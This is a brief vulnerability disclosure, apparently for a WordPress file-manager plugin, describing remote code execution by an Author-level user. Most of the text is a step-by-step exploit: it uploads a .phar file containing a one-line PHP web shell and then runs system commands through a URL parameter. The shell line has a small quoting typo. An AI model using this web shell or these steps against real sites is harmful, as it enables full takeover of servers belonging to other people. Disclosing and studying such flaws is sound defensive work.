Description The plugin is vulnerable from an RCE (Remote Code Execution) vulnerability, which allows the operating system to execute commands and fully compromise the server on behalf of a user with Author-level privileges.
1) Go to main dashboard of plugin http://your_site/wordpress/wp-admin/edit.php?post_type=filr
2) Add new File
3) Upload file with extention "phar" and malicious code inside, like <?php system($_GET['cmd]'); ?>
4) Go to http://your_site/wordpress/wp-content/uploads/filr/{number_of_post}/cmd.phar?cmd=ps+aux (or pwd or id) and do RCE